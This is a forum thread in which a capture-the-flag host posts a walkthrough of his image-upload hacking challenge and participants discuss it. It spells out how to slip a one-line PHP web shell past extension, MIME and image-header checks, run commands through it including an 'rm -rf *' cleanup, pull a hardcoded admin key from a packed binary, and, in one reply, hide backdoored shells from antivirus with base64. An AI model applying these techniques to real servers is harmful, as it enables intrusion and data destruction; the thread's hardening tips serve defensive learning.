Security Challenge II

h57xiucj2z946q

That's because of the tags. Browser will think its unknown HTML tag.

dlofnep

Mason Millions Organist wrote: »

That's because of the tags. Browser will think its unknown HTML tag.

It shouldn't do if it's inbetween pre tags though, as it won't be parsed as HTML. It should still list in the view source.

h57xiucj2z946q

dlofnep wrote: »

It shouldn't do if it's inbetween pre tags though, as it won't be parsed as HTML.

Oh! Hehe, I dunno then.

Was the pre tag closed?

dlofnep

<pre>
<b>hi</b>
<i>hi</i>
<?php echo 'test'; ?>
</pre>

try that and save it as pre.html.

Open it and you should see the two hi's, and then if you view the source you'll see the php code.

900913

http://damo.dyndns.info/images/pre.html

yep, two hi's

and in the source is the <?php echo 'test'; ?>

I'm getting more confused .

h57xiucj2z946q

As far as I was aware, <pre> doesn't ignore tag evaluation. You still need to replace < > with < and >

dlofnep

It will list the php code in the source, I'm sure of it. Check out my example 900913 has posted.

It worked for me when I attacked the application in anycase. I've done it a number of times before using that shell.

h57xiucj2z946q

dlofnep wrote: »

It will list the php code in the source, I'm sure of it. Check out my example 900913 has posted.

It worked for me when I attacked the application in anycase. I've done it a number of times before using that shell.

I thought yous were trying to display the code in the browser itself.

dlofnep

Well technically it's in the browser, just with view-source

h57xiucj2z946q

Haha ok.

I will be posting some notes on the challenge tomorrow or Sunday.

900913

Am I still going into the genius bloopers.

h57xiucj2z946q

Lol we'll see.

Pygmalion

900913 wrote: »

damo was there many shells(r57, c99 type) uploaded or did most people opt for the basic <? exec($_REQUEST/COLOR][COLOR=#FF0000]'cmd'[/COLOR][COLOR=#007700,?> type .

I didn't even do that, I just modified the file and re-uploaded after every command , I assumed at first

all I'd have to do is read from the halloffame.php file to see where the list of users are, then system("echo Pygmalion >> list.txt");

By the time I realised I couldn't do that I just wasn't bothered remembering how stuff like $_REQUEST work, been so long since I've used PHP.

h57xiucj2z946q

Hall of Fame:

CheeseCake_Monster
DonkeyS
peann
ack_
Phlux
900913
micols
Pygmalion

Solution:

The idea is to get your name on the hall of fame. All you are given is a page to upload and host your images. If you upload an image, you see that you are then given a direct link to the image you just uploaded. There isn't much here that gives us any trace of the hall of fame.

What if we could upload something more useful? other than an image. We know the server supports PHP. (you just loaded index.php)

Wouldn't it be a good idea to load some PHP code on the server?

Look at the source code of index.php. You will notice a java script trying to force you to only upload .jpg, .png, .gif files. There are a few ways to get around this.

Hard: debug the java script (tip: firebug)
Easy: save index.php locally and tweak the java-script and then use
Easier: disable java-script in the browser and upload
No action needed: users with no-script in Firefox would have to do nothing here. They may have not even known this check was in place.

Next you decide what PHP to upload. A shell would be nice. If you Google: "php shell", you will get some more info on this if you dunno what it is. The most basic shell: "<?php passthru($_GET); ?> Save as something.php. You can use this as something.php?cmd=ls -l
If you want to go further, you can get huge sophisticated shells like r57 or c99, however most of them today have back doors included, so the people who modified them, know exactly when and where you are using them. Also most antivirus detect these scripts.

Try upload your something.php to the server. Unfortunately you get a error:

something.php does not appear to be an image.
File is detected as: application/octet-stream

(Note for this article, I'm not prefixing the milliseconds on the file name, that was just to keep file names unique in the challenge)

So the browser is reporting the file's MIME type as application/octet-stream.
The MIME type must be in the POST data, so how can we fix this? Get tamper-data for Firefox. Open it up and click "Start Tamper", upload another image and when tamper data asks you what you want to do, click "Tamper". In the post data field on the top right, if you scroll down, you will see: application/octet-stream. You can change this to image/png or image/gif etc.. then click Submit/OK.

And yes another error..

something.php is not a VALID image!

If your lost. you can Google:
php check if file is image

Eventually you will come across "getimagesize() http://php.net/manual/en/function.getimagesize.php&quot; and see that it returns FALSE if the file is not an image. How do we fool this function?

Google: getimagesize hack
file upload exploit
image upload exploit etc..

You will come across two solutions:
Create a PHP file with a image header. e.g. get a PNG header or JPEG header (again Google this) and put it at the start of your .php script with a hex editor. This way the getimagesize() function will get a valid value from the header and the PHP interpreter will display all the other data raw in the browser, but still execute everything between <?php and ?>.

An easier way for less experienced people is to insert PHP code into the comment field of an image. E.g. get a small .PNG image, and use GIMP to edit the image comments. Save, rename to .php

If you bypass all of these checks in a row (extension check, mime check, image size check), you will end up with a .php on the server.

halloffame.php shows the current hall of fame, so lets try read that, assuming your using the simple shell above. With r57, c99 etc.. you can use the web interface it gives you instead.

damo.dyndns.info/images/something.php?cmd=ls -la
View page Source in the browser for better formatting or use <pre> tags in your script.

README? whats that?
damo.dyndns.info/images/something.php?cmd=cat README

If you can read this, then you are half way there :-)

Ok so we know the list of hall of fame is shown by halloffame.php, where does it get this list?
damo.dyndns.info/images/something.php?cmd=cat ../halloffame.php

You can see halloffame.php gets the list of users by executing:
exec("/home/challenge2/challenge2_admin_tool -l", $data, $ret);

What's challenge2_admin_tool? something.php?cmd=file /home/challenge2/challenge2_admin_tool
Its a Linux binary. (just a simple little c application for this challenge)

What does it do?
damo.dyndns.info/images/something.php?cmd=/home/challenge2/challenge2_admin_tool

Security Challenge II Administration Tool v1.0
        Use this tool to manage the Security Challenge II Hall of Fame
        
        Usage: challenge2_admin_tool [OPTION]...
        
        List Hall of Fame members:
          -l, --list                lists the current members of the hall of fame
        
        Add a new user to Hall of Fame: (requires admin key)
          -a, --add                 Add a new user to the Hall of Fame
          -k, --adminkey=ADMINKEY   Security Challenge admin key
          -n, --newname=NEWNAME     New username to add to Hall of Fame
        
        Example: challenge2_admin_tool -l
                 challenge2_admin_tool -a -k AdminKey -n NewName

How do we get the admin key? Lets try some things first before we resort to debugging.
damo.dyndns.info/images/something.php?cmd=strings /home/challenge2/challenge2_admin_tool > /var/www/images/strings.txt
Then open damo.dyndns.info/images/strings.txt in the browser. Take a look through and see if there is anything interesting. You can see a

UPX section in the ELF for a start. Also at the end of the binary you see

Info: This file is packed with the UPX executable packer 

http://upx.sf.net $
 $Id: UPX 3.05 Copyright (C) 1996-2010 the UPX Team. All Rights Reserved.

An executable packer. I wonder can we unpack easily?
Google: Upx, You should arrive here easily enough: http://linux.die.net/man/1/upx. You will see:

Decompress

All UPX supported file formats can be unpacked using the -d switch, eg. upx -d yourfile.exe will un-compress the file you've just 

compressed.

damo.dyndns.info/images/something.php?cmd=upx -d /home/challenge2/challenge2_admin_tool won't work.
For 1. you only have write permissions to /var/www/images and 2. because the admin is a pain in the ass, and he removed upx from the server :-P (doesn't normally come on Debian anyway, but you can get it easily by (as root): aptitude install upx)

Note: if you googled "UPX unpack", you will come across many articles to show you how to manually unpack UPX with debuggers and memory dumpers, however the UPX tool can unpack the binary automatically anyway!

Another tip, you can use UPX on Windows to unpack a ELF binary, and use UPX on linux to unpack a Win32 binary etc.
So what you can do is download the challenge2_admin_tool tool (copy it to the images folder and download with the browser. Zip it first if your browser is displaying it as raw rather than letting you download). Get a copy of UPX here: upx.sourceforge.net

UPX -d challenge2_admin_tool Now you have an unpacked ELF. Lets look through this. This binary is a whopping 500kB, so lets search for known strings. You can filter it down a little if your using Linux, just run "strings" on this again, cygwin users on Windows also has "strings", else use a hex editor.

Search for e.g "Security Challenge II Administration Tool" which is a string we got from running the executable above. This will take us to the .data section of the ELF. Take a look around for possible pass-phrases. Eventually you will come across: "x5Tby78RTRa43Rdf5rR432"

This looks like a password? Lets try it:
damo.dyndns.info/images/something.php?cmd=strings /home/challenge2/challenge2_admin_tool -a -k x5Tby78RTRa43Rdf5rR432 -n MeMeMe

Added MeMeMe to the Hall of Fame. Congratulations MeMeMe :-)

This 2nd part of the challenge was supposed to be easier. The exe is normally about 6kb (4kb upx packed), so searching through it would have been easier, however UPX doesn't like small executables. So I compiled it statically which bloated it up enough for UPX to accept.

It just meant you got a load of strings from the statically linked libraries in the exe also.

# gcc --static challenge2_admin_tool.c -o challenge2_admin_tool
# strip challenge2_admin_tool
# upx -9 challenge2_admin_tool

Also note, the path of the hall of fame file is cyphered in the binary, this is to discourage people looking for and manually editing the hall of fame file. It is also cyphered anyway :-)

So that was basically all that was to this challenge. Clean up after yourself: damo.dyndns.info/images/something.php?cmd=\rm -rf *
This will only delete files owned by www-data in images folder.


I have uploaded the source code of the web-server files, and the admin tool if anyone wants to host a similar challenge.


Some notes about the server:

This was Debian 6 running Apache 2/PHP5 with latest OS & package updates running in a VM hosted on Windows 7.

If you are thinking of running a similar challenge, I would suggest applying some of this hardening:

* Debian and latest apache2 in repositories by default are pretty good at setting up permissions. E.g. only root can view Apache config files, this is also the case with Apache log files. PHP by default has logging been re-directed to the web-server disabled. They will come out in Apache logs instead.

Apache's default config file was updated to disable indexing of /var/www's content. This means users could get a list of all files in the /var/www/images/ folder, and may have gotten hints from other users work. To prevent this, I edited:
/etc/apache2/sites-enabled/default

DocumentRoot /var/www
	
<Directory />
		
	Options Indexes FollowSymLinks
		
	AllowOverride None
	
</Directory>

And remove "Indexes" from above and restart Apache.



Disable outgoing connections for "www-data" using IPtables.

# iptables --new-chain out_apache
# iptables --append OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# iptables --append OUTPUT -m owner --uid-owner www-data -j out_apache
# iptables --append out_apache -j REJECT

Also install iptables-persistent:

# aptitude install iptables-persistent
# iptables-save > /etc/iptables/rules

Now your rules will survive a reboot.

Reverse shells are nice and would have been fun for this challenge, however since anyone could have made any outgoing connection, this would have came from my IP, therefore i would have been responsible if any dodgy connections was made.

Prevent a forkbomb, ulimit the www-data user:
Edit /etc/security/limits.conf and add:

www-data        soft    nproc           20
www-data        hard    nproc           50

Update OS with latest OS/Kernel/packages to prevent privladge escallation exploits:

# apt-get update
# apt-get upgrade

Remove gcc to prevent code been compiled on server. Note this will only discourage some people, as its still possible to upload pre-compiled binaries. (Malic uploaded the www.exploit-db.com/exploits/15304/ exploit in a binary with an image header, then used "sed" on the server to remove the header, leaving a working executable. The server however was not vulnerable to this exploit. it is a pretty new
exploit though [around October 2010], so check your systems).

# apt-get remove gcc   or   aptitude remove gcc

If you want to leave SSH server open so you can monitor the server remotely, restrict what IP's can connect through SSH by using either:
1. hosts.deny file
2. SSH Config file
3. Iptables

This will also discourage people trying to brute force a login encase they think its part of the challenge.


Some bloopers which let to extra hardening of the system:

At the start Cheesecake Monster did rm * after he got on the Hall of Fame. This removed the half way indicator file also "README". This was later prevented by setting the sticky bit on the images/ folder.

# chmod 1777 /var/www/images
or
# chmod +t /var/www/images

root@challenge:~# ls -l /var/www/
total 64
-rw-r--r-- 1 challenge2 challenge2   453 Apr  5 20:16 about.php
-rw-r--r-- 1 challenge2 challenge2 14929 Apr  2 17:02 banner.png
-rw-r--r-- 1 challenge2 challenge2  1674 Apr  3 20:31 challenge.php
-rw-r--r-- 1 challenge2 challenge2   115 Apr  3 02:38 footer.htm
-rw-r--r-- 1 challenge2 challenge2   458 Apr  3 20:49 halloffame.php
-rw-r--r-- 1 challenge2 challenge2   509 Apr  2 19:01 header.htm
drwxrwxrw[B]t[/B] 2 challenge2 challenge2 20480 Apr  9 01:49 images
-rw-r--r-- 1 challenge2 challenge2  1654 Apr  2 22:23 index.php
-rw-r--r-- 1 challenge2 challenge2  1929 Apr  7 21:33 uploadimage.php

This means only www-data can delete files created by www-data. Only the owner can delete their own files. README was owned by challenge2 user.


900913 found the Hall of Fame file in "/var/tmp/ /". yes that's a space, so you need to use the following in a shell to get to it. (Note: probably not needed for web-shells)

# cd /var/tmp/" "/      or
# cd /var/tmp/\ /

This file is cyphered, but 990913 put his name in the file anyway in plain text, so the hall of fame on the web-server has his name cyphered (reverse cyphered).

To discourage finding and editing this file manually, the hall of fame file was then renamed, and the directory "/var/tmp/ /" had its +r bit removed, but left its +xw bit intact. For a directory, this permission setup will allow a user to read/write a file in the directory when they specify the file name, but the user cannot get a list of all files in this directory. Therefore they cannot manually edit the hall of fame file, unless they know its exact name.

# chmod -r /var/tmp/" "

root@challenge:~# ls -l /var/tmp
total 4
d-wx-wx-wx 2 challenge2 challenge2 4096 Apr  9 10:15

# su - www-data
# ls -la /var/tmp/\ /
ls: /var/tmp/\ /: Permission denied

dlofnep

Brilliant challenge, I really enjoyed it. Best so far, and certainly the most difficult.

h57xiucj2z946q

Cheers dlofnep.

Forgot the source files. Attached now.

dlofnep

Sound man

PeterHughes

Cheers for the challenge

and I also learned a lot about NoScript along the way.

Procasinator

Unfortunately I missed this challenge.

Regarding finding the hall0ffamefile.

Another potential to find the file would be using the strace tool (which I think is installed by default):

strace -e trace=open ./challenge2_admin_tool

Which will show all calls to open.

Of course, using this method you'd have to figure out who to encrypt/decrypt the strings yourself (as the names are XORed with 0x81).

h57xiucj2z946q

Procasinator wrote: »

Unfortunately I missed this challenge.

Regarding finding the hall0ffamefile.

Another potential to find the file would be using the strace tool (which I think is installed by default):

strace -e trace=open ./challenge2_admin_tool

Which will show all calls to open.

Of course, using this method you'd have to figure out who to encrypt/decrypt the strings yourself (as the names are XORed with 0x81).

Yes Procasinator, this would work, similar to truss on some versions on UNIX.

As for the crypt, one could get the first char of the first user in the hall of fame, and xor this against the the first char of the first user in the fall of fame file.. E.g. 'C' (0x64) XOR 'Â' (0xC2) = 0x81. And you could check with the 2nd character so see if it matches and so on. This was only a basic crypt to try steer the attacker away from manually editing the file.

Procasinator

Mason Millions Organist wrote: »

Yes Procasinator, this would work, similar to truss on some versions on UNIX.

As for the crypt, one could get the first char of the first user in the hall of fame, and xor this against the the first char of the first user in the fall of fame file.. E.g. 'C' (0x64) XOR 'Â' (0xC2) = 0x81. And you could check with the 2nd character so see if it matches and so on. This was only a basic crypt to try steer the attacker away from manually editing the file.

Yeah, it wouldn't have taken too long to figure out the encryption scheme.

Another option have been to use setuid/setgid on the challenge2_admin_tool tool, and only allow a user who isn't www-data own the program to access (read and write) the .hall0ffame file. That way any access to the .hall0ffame file would have to go through the challenge2_admin_tool (unless an privilege escalation vulnerability existed somewhere).

All www-data would need is execute privileges on challenge2_admin_tool.

h57xiucj2z946q

Procasinator wrote: »

Yeah, it wouldn't have taken too long to figure out the encryption scheme.

Another option have been to use setuid/setgid on the challenge2_admin_tool tool, and only allow a user who isn't www-data own the program to access (read and write) the .hall0ffame file. That way any access to the .hall0ffame file would have to go through the challenge2_admin_tool (unless an privilege escalation vulnerability existed somewhere).

All www-data would need is execute privileges on challenge2_admin_tool.

I was thinking of that, but was afraid it may lead people off on the wrong trail. Privilege escalation. Hehe you'll notice I don't sanitize the buffers too well or at all in that small tool, so that could have been possible, although I assume latest kernels and gcc compilers offer some protection against basic buffer overflows. :-)

900913

Brilliant challenge,

The only part I disagree with is:

Clean up after yourself: damo.dyndns.info/images/something.php?cmd=\rm -rf *
This will only delete files owned by www-data in images folder.

I know it was only a fun challenge but in real life that could wipe every image that's linked to in the html directory .

The first three directorys I always check are /home /etc and /tmp and after that /root .

damo
Would an ls -al /var/tmp/ have shown that hidden file.

I just realised that if I was smarter I could of waited to near to the end of the challenge and then deleted all the other halloffame names and added mine right at the end.
But you caught me out before I even thought of it.


How long until the next challenge?

h57xiucj2z946q

900913 wrote: »

Would an ls -al /var/tmp/ have shown that hidden file.

Well the hidden file was in a folder called " ", so this doesn't look noticeable on shells.
So you need to to a ls -la /var/tmp/\ / but only root can "list" this directory.

I just realised that if I was smarter I could of waited to near to the end of the challenge and then deleted all the other halloffame names and added mine right at the end.
But you caught me out before I even thought of it.

Hehe stuff like that is what would make be take down the challenge :-)

How long until the next challenge?

Not sure, would like to see other people put up challenges also.

Did you try my first challenge when it was up?

900913

I only tried one other challenge from boards.ie It was by dlofnep.

I'd never delete anything from a server, thats why I disagreed with the :

damo.dyndns.info/images/something.php?cmd=\rm -rf *

If I did that I would delete all the other attempted shells.


I missed your last challenge, I hope it was easier than this.

h57xiucj2z946q

Previous challenge was:
http://www.boards.ie/vbulletin/showthread.php?t=2056169934

And before that:
http://www.boards.ie/vbulletin/showpost.php?p=56614533&postcount=159
http://www.boards.ie/vbulletin/showpost.php?p=56619038&postcount=166

900913

If you want to go further, you can get huge sophisticated shells like r57 or c99, however most of them today have back doors included, so the people who modified them, know exactly when and where you are using them. Also most antivirus detect these scripts.

True, even in the plain text shells you can add a base64 encoded backdoor that emails you the location of the shell, I have a few floating around, but every time googlebot touches one of them I get an email(nightmare).

Also most antivirus detect these scripts

You know yourself, the av will only alert if there in plain text, If you use base64 type encoding your ok,

But then again, if you use an encoded shell that you didn't encode yourself,
chances are it's backdoored .

Here's an example of the info I get from backdoored shells.

Fri, 15 Apr 2011 05:32:44 +0200
IP: 00.000.00.000 | Hostname: crawl-66-249-66-232.googlebot.com
User Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | Page: /zzzzzzzzz/zzzzzzz/zzzzzzzz.php?x=aaaaaaaaa&d=%2Fhome%2aaaaaaa37%2Fpublic_html%2F_aaaaaa%2F&pid=000000&zzz=0
URL: http://zzzzzz.zzz/dir/dir/dir.php?x=ssssss&d=%2Fhome%2Fssssss37%2Fpublic_html%2Fsssssss%2F&ccccc=99999&xxxx=999

It even gives the ip address of the person who is using the shell.

*edit

Ive been following some hackers with this shell for a year now...
Every sever they get on to they upload a php mailer script and then usually up a phishing site.

Backdoored shell=mobile honeypot

h57xiucj2z946q

900913 wrote: »

How long until the next challenge?

Not long, started working on some ideas, have nearly everything though of, just need to start coding now. Unfortunately some may find it a bit more tricky than last one.

dlofnep

Mason Millions Organist wrote: »

Not long, started working on some ideas, have nearly everything though of, just need to start coding now. Unfortunately some may find it a bit more tricky than last one.

There's nothing unfortunate about that Anything that will push our limits will only make us better.

h57xiucj2z946q

Im making progress, will have something up in the next few days.

Anyone else got any challenges planned>